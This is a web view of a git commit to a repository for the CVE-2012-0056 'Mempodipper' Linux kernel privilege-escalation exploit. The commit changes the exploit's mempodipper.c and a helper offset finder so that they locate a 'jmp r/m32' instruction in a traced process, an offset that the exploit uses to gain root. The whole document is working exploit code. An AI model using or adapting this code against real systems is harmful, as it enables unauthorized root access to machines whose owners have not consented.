aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 17:38:32 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 18:12:08 +0100
commit513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch)
tree8d22ee73ab5d88ec5fae5b661b3795cb95eb870b
parentNot always exit@plt (diff)
downloadCVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.tar.xz
CVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.zip
Search for IP of next jmp instead.
-rw-r--r--mempodipper.c10
-rw-r--r--ptrace-offset-finder.c9
2 files changed, 6 insertions, 13 deletions
diff --git a/mempodipper.c b/mempodipper.c
index dcc037c..e35d62a 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
#define _LARGEFILE64_SOURCE
#include <stdio.h>
-#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
}
}
} else {
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c
index d339c18..5a5daab 100644
--- a/ptrace-offset-finder.c
+++ b/ptrace-offset-finder.c
@@ -1,6 +1,5 @@
#include <stdio.h>
#include <stdlib.h>
-#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
@@ -41,11 +40,9 @@ int main(int argc, char *argv[])
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- printf("0x%lx\n", instruction_pointer + offset);
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) {
+ printf("0x%lx\n", instruction_pointer);
break;
}
}